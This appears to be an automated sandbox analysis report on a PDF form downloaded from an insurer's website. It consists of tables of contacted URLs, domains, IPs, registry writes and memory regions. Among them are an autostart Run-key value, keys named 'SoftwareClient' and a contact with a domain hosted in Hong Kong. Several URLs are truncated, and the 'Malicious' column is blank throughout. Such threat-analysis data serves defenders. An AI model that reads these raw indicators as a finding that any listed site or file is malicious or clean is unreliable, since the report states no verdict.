https://tse1.mm.bing.net/th?id=OADD2.10239360289361_1Y3IOPY47MV63L7US&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://weibo.com/
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239381138052_1MNXWX7WFZ12D7OBJ&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90
|
150.171.27.10
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://www.oldmutual.co.za/favicon.ico
|
18.161.69.63
|
||
https://www.reddit.com/
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
https://github.com/mozilla/webcompat-reporter
|
unknown
|
||
https://www.amazon.co.uk/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
https://screenshots.firefox.com/
|
unknown
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|
|||
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://www.google.com/search?client=firefox-b-d&q=
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
https://www.wykop.pl/
|
unknown
|
||
https://twitter.com/
|
unknown
|
||
https://digify.com/a/#/access/logincmd
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.olx.pl/
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://support.mozilla.org/products/firefox
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239360432890_1TOC5U5IB565A9QI0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://www.amazon.fr/
|
unknown
|
||
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
https://www.google.com/complete/
|
unknown
|
||
https://support.mozilla.org
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239360432892_19VCX0OIIPQAUNJ24&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://www.google.com/
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239360288102_1UBFDLT4HJHZEPK84&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://www.amazon.de/
|
unknown
|
||
https://www.baidu.com/
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
d12y248af9ueom.cloudfront.net
|
18.161.69.63
|
||
www.google.com
|
142.250.181.132
|
||
kiltone.top
|
45.125.67.168
|
||
www.oldmutual.co.za
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
239.255.255.250
|
unknown
|
Reserved
|
||
45.125.67.168
|
kiltone.top
|
Hong Kong
|
||
18.161.69.63
|
d12y248af9ueom.cloudfront.net
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
192.168.2.6
|
unknown
|
unknown
|
||
142.250.181.132
|
www.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
XPSUDTARW
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
UID
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Public
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Private
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWindowsOnlyEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fPasteOriginalEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fReverse
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWrapAround
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fMatchCase
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1C76F422000
|
heap
|
page read and write
|
||
203B057A000
|
heap
|
page read and write
|
||
203B0440000
|
heap
|
page read and write
|
||
BCCF000
|
heap
|
page read and write
|
||
38C3C7A000
|
stack
|
page read and write
|
||
7D03FFE000
|
unkown
|
page readonly
|
||
7D0417E000
|
stack
|
page read and write
|
||
A681000
|
heap
|
page read and write
|
||
55A000
|
heap
|
page read and write
|
||
26459200000
|
heap
|
page read and write
|
||
2026AE2A000
|
heap
|
page read and write
|
||
29AC000
|
heap
|
page read and write
|
||
1C76F1F3000
|
heap
|
page read and write
|
||
2026ADB0000
|
trusted library allocation
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
26459313000
|
heap
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
1EC191C2000
|
heap
|
page read and write
|
||
1EF63E3E000
|
heap
|
page read and write
|
||
1EC18CBB000
|
heap
|
page read and write
|
||
27413BC0000
|
heap
|
page read and write
|
||
D260A7E000
|
stack
|
page read and write
|
||
26458B29000
|
heap
|
page read and write
|
||
A789000
|
heap
|
page read and write
|
||
53275FE000
|
stack
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
2645E263000
|
heap
|
page read and write
|
||
1EC191C5000
|
heap
|
page read and write
|
||
A1CC87F000
|
stack
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
BB90000
|
trusted library allocation
|
page read and write
|
||
1EC191C3000
|
heap
|
page read and write
|
||
1F4006F7000
|
heap
|
page read and write
|
||
26458AB1000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1F400720000
|
heap
|
page read and write
|
||
264589E0000
|
trusted library allocation
|
page read and write
|
||
1EF63E37000
|
heap
|
page read and write
|
||
1EC18A54000
|
heap
|
page read and write
|
||
A681000
|
heap
|
page read and write
|
||
1EF63F87000
|
heap
|
page read and write
|
||
1EF63E3E000
|
heap
|
page read and write
|
||
203B0620000
|
heap
|
page read and write
|
||
1C76F1F8000
|
heap
|
page read and write
|
||
BA83000
|
heap
|
page read and write
|
||
CBED77F000
|
stack
|
page read and write
|
||
1EC191C0000
|
heap
|
page read and write
|
||
A1CC51A000
|
stack
|
page read and write
|
||
27413C02000
|
heap
|
page read and write
|
||
EDF4FFE000
|
stack
|
page read and write
|
||
2026AE57000
|
heap
|
page read and write
|
||
2645E030000
|
trusted library allocation
|
page read and write
|
||
566000
|
heap
|
page read and write
|
||
1C76F927000
|
heap
|
page read and write
|
||
1F400C27000
|
heap
|
page read and write
|
||
45E000
|
unkown
|
page readonly
|
||
2567B206000
|
heap
|
page read and write
|
||
1C76F3D0000
|
trusted library allocation
|
page read and write
|
||
1EC18A63000
|
heap
|
page read and write
|
||
38C3EFF000
|
stack
|
page read and write
|
||
274143EC000
|
heap
|
page read and write
|
||
2026AE20000
|
heap
|
page read and write
|
||
1C76F495000
|
heap
|
page read and write
|
||
2645E306000
|
heap
|
page read and write
|
||
21DF55E0000
|
heap
|
page read and write
|
||
7D036FE000
|
unkown
|
page readonly
|
||
274143DE000
|
heap
|
page read and write
|
||
274143D3000
|
heap
|
page read and write
|
||
2567B178000
|
heap
|
page read and write
|
||
1EF63847000
|
heap
|
page read and write
|
||
1EC19008000
|
heap
|
page read and write
|
||
1EF63E3A000
|
heap
|
page read and write
|
||
55D000
|
heap
|
page read and write
|
||
D0E0000
|
trusted library allocation
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
B073000
|
heap
|
page read and write
|
||
1F4007E0000
|
trusted library allocation
|
page read and write
|
||
1C76F490000
|
heap
|
page read and write
|
||
27413BD7000
|
heap
|
page read and write
|
||
42B000
|
unkown
|
page readonly
|
||
2026B3D2000
|
heap
|
page read and write
|
||
1C76F1C3000
|
heap
|
page read and write
|
||
2645E304000
|
heap
|
page read and write
|
||
7D031FE000
|
stack
|
page read and write
|
||
2645931B000
|
heap
|
page read and write
|
||
21DF5399000
|
heap
|
page read and write
|
||
B2B7000
|
heap
|
page read and write
|
||
7D034FE000
|
unkown
|
page readonly
|
||
26458A77000
|
heap
|
page read and write
|
||
A8B2000
|
heap
|
page read and write
|
||
1C76F932000
|
heap
|
page read and write
|
||
1F4006F3000
|
heap
|
page read and write
|
||
1C76F204000
|
heap
|
page read and write
|
||
5A3000
|
heap
|
page read and write
|
||
D26087A000
|
stack
|
page read and write
|
||
2645931A000
|
heap
|
page read and write
|
||
1EF63800000
|
heap
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
26458A00000
|
heap
|
page read and write
|
||
2645E100000
|
remote allocation
|
page read and write
|
||
1F4006C0000
|
heap
|
page read and write
|
||
274143DA000
|
heap
|
page read and write
|
||
1C76F3D0000
|
trusted library allocation
|
page read and write
|
||
1EC18A39000
|
heap
|
page read and write
|
||
1F400C2A000
|
heap
|
page read and write
|
||
203B0640000
|
heap
|
page read and write
|
||
59E000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
26459B80000
|
trusted library section
|
page readonly
|
||
1F400715000
|
heap
|
page read and write
|
||
7D035FC000
|
stack
|
page read and write
|
||
2567B170000
|
heap
|
page read and write
|
||
1C76F210000
|
heap
|
page read and write
|
||
B18C000
|
heap
|
page read and write
|
||
1C76F1F9000
|
heap
|
page read and write
|
||
1EC18A36000
|
heap
|
page read and write
|
||
1C76F42A000
|
heap
|
page read and write
|
||
4C7000
|
heap
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
2026AE2A000
|
heap
|
page read and write
|
||
27413C1B000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
274143E0000
|
heap
|
page read and write
|
||
2645E30D000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
1EC1AB20000
|
heap
|
page read and write
|
||
27413D90000
|
trusted library allocation
|
page read and write
|
||
2026AE92000
|
heap
|
page read and write
|
||
1C76F92C000
|
heap
|
page read and write
|
||
26459941000
|
trusted library allocation
|
page read and write
|
||
21DF5340000
|
heap
|
page read and write
|
||
19C4D968000
|
heap
|
page read and write
|
||
1EF63F92000
|
heap
|
page read and write
|
||
27413BB0000
|
trusted library allocation
|
page read and write
|
||
274143D0000
|
heap
|
page read and write
|
||
27413BF7000
|
heap
|
page read and write
|
||
C6CF000
|
heap
|
page read and write
|
||
2645DF90000
|
trusted library allocation
|
page read and write
|
||
1F400715000
|
heap
|
page read and write
|
||
BA8C000
|
heap
|
page read and write
|
||
27413C2B000
|
heap
|
page read and write
|
||
1F4006E9000
|
heap
|
page read and write
|
||
26459302000
|
heap
|
page read and write
|
||
27413D90000
|
trusted library allocation
|
page read and write
|
||
1EC19000000
|
heap
|
page read and write
|
||
CBED67E000
|
stack
|
page read and write
|
||
D2609FE000
|
stack
|
page read and write
|
||
2026AE25000
|
heap
|
page read and write
|
||
1EF63F92000
|
heap
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
2645E290000
|
heap
|
page read and write
|
||
2026ADF0000
|
heap
|
page read and write
|
||
27413C12000
|
heap
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
1EC191CA000
|
heap
|
page read and write
|
||
274143E8000
|
heap
|
page read and write
|
||
38C3D7F000
|
stack
|
page read and write
|
||
26458A72000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
27413C14000
|
heap
|
page read and write
|
||
1EC18A49000
|
heap
|
page read and write
|
||
A783000
|
heap
|
page read and write
|
||
29C3000
|
heap
|
page read and write
|
||
2645E300000
|
heap
|
page read and write
|
||
274143D4000
|
heap
|
page read and write
|
||
A78F000
|
heap
|
page read and write
|
||
1EC18930000
|
heap
|
page read and write
|
||
2567B226000
|
heap
|
page read and write
|
||
1EF6383B000
|
heap
|
page read and write
|
||
21DF5374000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
21DF5369000
|
heap
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
1EF63817000
|
heap
|
page read and write
|
||
A1CC9FE000
|
stack
|
page read and write
|
||
26458B13000
|
heap
|
page read and write
|
||
2567B202000
|
heap
|
page read and write
|
||
27413BD7000
|
heap
|
page read and write
|
||
BCC0000
|
trusted library allocation
|
page read and write
|
||
1C76F1F9000
|
heap
|
page read and write
|
||
A1CC8FF000
|
stack
|
page read and write
|
||
1EF63A30000
|
trusted library allocation
|
page read and write
|
||
203B0598000
|
heap
|
page read and write
|
||
203B2260000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
2830000
|
heap
|
page read and write
|
||
2645DFBE000
|
trusted library allocation
|
page read and write
|
||
2026AD70000
|
heap
|
page read and write
|
||
1EF63E3B000
|
heap
|
page read and write
|
||
A786000
|
heap
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
434507D000
|
stack
|
page read and write
|
||
2567B209000
|
heap
|
page read and write
|
||
1C76F42E000
|
heap
|
page read and write
|
||
1F400845000
|
heap
|
page read and write
|
||
274143DB000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
1F400C2A000
|
heap
|
page read and write
|
||
1EC191C4000
|
heap
|
page read and write
|
||
1EC18A54000
|
heap
|
page read and write
|
||
1C76F211000
|
heap
|
page read and write
|
||
21DF5413000
|
heap
|
page read and write
|
||
1F400D84000
|
heap
|
page read and write
|
||
1F400734000
|
heap
|
page read and write
|
||
26458A8C000
|
heap
|
page read and write
|
||
2026AE2E000
|
heap
|
page read and write
|
||
2645E2C4000
|
heap
|
page read and write
|
||
1F400C2E000
|
heap
|
page read and write
|
||
132CAFE000
|
stack
|
page read and write
|
||
7D0407E000
|
stack
|
page read and write
|
||
1EC18A60000
|
heap
|
page read and write
|
||
A780000
|
trusted library allocation
|
page read and write
|
||
2645DFA0000
|
trusted library allocation
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1EF63E37000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
1F40071E000
|
heap
|
page read and write
|
||
26459B50000
|
trusted library section
|
page readonly
|
||
1C771380000
|
heap
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
1EC18950000
|
heap
|
page read and write
|
||
2645DEE0000
|
trusted library allocation
|
page read and write
|
||
1EC18970000
|
trusted library allocation
|
page read and write
|
||
532757F000
|
stack
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
2567B1A1000
|
heap
|
page read and write
|
||
2645E256000
|
heap
|
page read and write
|
||
456000
|
unkown
|
page write copy
|
||
29C5000
|
heap
|
page read and write
|
||
A67A000
|
heap
|
page read and write
|
||
274143DA000
|
heap
|
page read and write
|
||
1EF63E33000
|
heap
|
page read and write
|
||
27413C06000
|
heap
|
page read and write
|
||
1F4007E0000
|
trusted library allocation
|
page read and write
|
||
2645DF60000
|
trusted library allocation
|
page read and write
|
||
42B000
|
unkown
|
page readonly
|
||
2645E302000
|
heap
|
page read and write
|
||
2980000
|
heap
|
page read and write
|
||
19C4D870000
|
heap
|
page read and write
|
||
27413C2B000
|
heap
|
page read and write
|
||
2645E251000
|
heap
|
page read and write
|
||
A8B5000
|
heap
|
page read and write
|
||
1EF63F80000
|
heap
|
page read and write
|
||
EDF56FE000
|
stack
|
page read and write
|
||
2E30000
|
heap
|
page read and write
|
||
2026AE92000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
1EC18A52000
|
heap
|
page read and write
|
||
A786000
|
heap
|
page read and write
|
||
29C0000
|
heap
|
page read and write
|
||
1EF63E3A000
|
heap
|
page read and write
|
||
7D03B7E000
|
stack
|
page read and write
|
||
7D032FE000
|
unkown
|
page readonly
|
||
2300000
|
heap
|
page read and write
|
||
2B9F000
|
stack
|
page read and write
|
||
26459EE0000
|
trusted library allocation
|
page read and write
|
||
22AD000
|
stack
|
page read and write
|
||
D26097F000
|
stack
|
page read and write
|
||
1C76F424000
|
heap
|
page read and write
|
||
1C76F210000
|
heap
|
page read and write
|
||
EDF55FD000
|
stack
|
page read and write
|
||
274143D7000
|
heap
|
page read and write
|
||
2026AD90000
|
heap
|
page read and write
|
||
1EC18A18000
|
heap
|
page read and write
|
||
3A1000
|
unkown
|
page execute read
|
||
27413B60000
|
heap
|
page read and write
|
||
274143F2000
|
heap
|
page read and write
|
||
A676000
|
heap
|
page read and write
|
||
1F400C23000
|
heap
|
page read and write
|
||
2645E0A0000
|
trusted library allocation
|
page read and write
|
||
27413C15000
|
heap
|
page read and write
|
||
573000
|
heap
|
page read and write
|
||
2645E2E7000
|
heap
|
page read and write
|
||
2567B010000
|
heap
|
page read and write
|
||
26458A92000
|
heap
|
page read and write
|
||
A249000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
7D030FE000
|
unkown
|
page readonly
|
||
2026B3C7000
|
heap
|
page read and write
|
||
2026B3D2000
|
heap
|
page read and write
|
||
26459840000
|
trusted library allocation
|
page read and write
|
||
2026B3D4000
|
heap
|
page read and write
|
||
2567CB95000
|
heap
|
page read and write
|
||
7D03AFE000
|
unkown
|
page readonly
|
||
2026AE57000
|
heap
|
page read and write
|
||
2645E319000
|
heap
|
page read and write
|
||
1C76F1E7000
|
heap
|
page read and write
|
||
2026AE86000
|
heap
|
page read and write
|
||
1EC18A09000
|
heap
|
page read and write
|
||
B079000
|
heap
|
page read and write
|
||
1F40071E000
|
heap
|
page read and write
|
||
1F400D78000
|
heap
|
page read and write
|
||
38C3DFE000
|
stack
|
page read and write
|
||
1EC19012000
|
heap
|
page read and write
|
||
1F400C20000
|
heap
|
page read and write
|
||
573000
|
heap
|
page read and write
|
||
1EC18A00000
|
heap
|
page read and write
|
||
2026AE48000
|
heap
|
page read and write
|
||
1F400D70000
|
heap
|
page read and write
|
||
19C4D98B000
|
heap
|
page read and write
|
||
B073000
|
heap
|
page read and write
|
||
27413C00000
|
heap
|
page read and write
|
||
D2608FE000
|
stack
|
page read and write
|
||
D668FD000
|
stack
|
page read and write
|
||
7D040FE000
|
unkown
|
page readonly
|
||
A8BA000
|
heap
|
page read and write
|
||
259C000
|
stack
|
page read and write
|
||
1C76F1EB000
|
heap
|
page read and write
|
||
27413BD2000
|
heap
|
page read and write
|
||
1C76F1B9000
|
heap
|
page read and write
|
||
27413BFB000
|
heap
|
page read and write
|
||
B183000
|
heap
|
page read and write
|
||
1F400C2A000
|
heap
|
page read and write
|
||
2260000
|
heap
|
page read and write
|
||
2ABF000
|
stack
|
page read and write
|
||
A6CC000
|
heap
|
page read and write
|
||
2026AE00000
|
heap
|
page read and write
|
||
26458B02000
|
heap
|
page read and write
|
||
B18F000
|
heap
|
page read and write
|
||
1F4005C0000
|
heap
|
page read and write
|
||
1C76F49B000
|
heap
|
page read and write
|
||
27413BF5000
|
heap
|
page read and write
|
||
1C76F420000
|
heap
|
page read and write
|
||
27A8000
|
heap
|
page read and write
|
||
7D03CFE000
|
unkown
|
page readonly
|
||
274143D7000
|
heap
|
page read and write
|
||
2026AF40000
|
trusted library allocation
|
page read and write
|
||
7D03BFE000
|
unkown
|
page readonly
|
||
1C76F390000
|
heap
|
page read and write
|
||
1EC18CB5000
|
heap
|
page read and write
|
||
19C4DC05000
|
heap
|
page read and write
|
||
21DF540B000
|
heap
|
page read and write
|
||
1C76F1C2000
|
heap
|
page read and write
|
||
19C4DA80000
|
heap
|
page read and write
|
||
27413C1A000
|
heap
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
1F400D77000
|
heap
|
page read and write
|
||
2026AE9C000
|
heap
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
38C3E7E000
|
stack
|
page read and write
|
||
26459B70000
|
trusted library section
|
page readonly
|
||
A673000
|
heap
|
page read and write
|
||
1EF63855000
|
heap
|
page read and write
|
||
27413C02000
|
heap
|
page read and write
|
||
7D03D7E000
|
stack
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
7D03F7E000
|
stack
|
page read and write
|
||
26459A60000
|
trusted library allocation
|
page read and write
|
||
1EF63A9B000
|
heap
|
page read and write
|
||
2026AE2E000
|
heap
|
page read and write
|
||
1EF63910000
|
heap
|
page read and write
|
||
27413EB0000
|
heap
|
page read and write
|
||
A679000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1C76F210000
|
heap
|
page read and write
|
||
1F4007E0000
|
trusted library allocation
|
page read and write
|
||
1C76F1F5000
|
heap
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
27413C12000
|
heap
|
page read and write
|
||
2026AE22000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
2026B3C0000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
1EC18970000
|
trusted library allocation
|
page read and write
|
||
1F400C2B000
|
heap
|
page read and write
|
||
7D038FE000
|
unkown
|
page readonly
|
||
26459B40000
|
trusted library section
|
page readonly
|
||
22F0000
|
heap
|
page read and write
|
||
27413C1A000
|
heap
|
page read and write
|
||
1EF63F8C000
|
heap
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
21DF7360000
|
heap
|
page read and write
|
||
2567B1B4000
|
heap
|
page read and write
|
||
255B000
|
stack
|
page read and write
|
||
2567B1A3000
|
heap
|
page read and write
|
||
1EC191CE000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
27413C02000
|
heap
|
page read and write
|
||
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|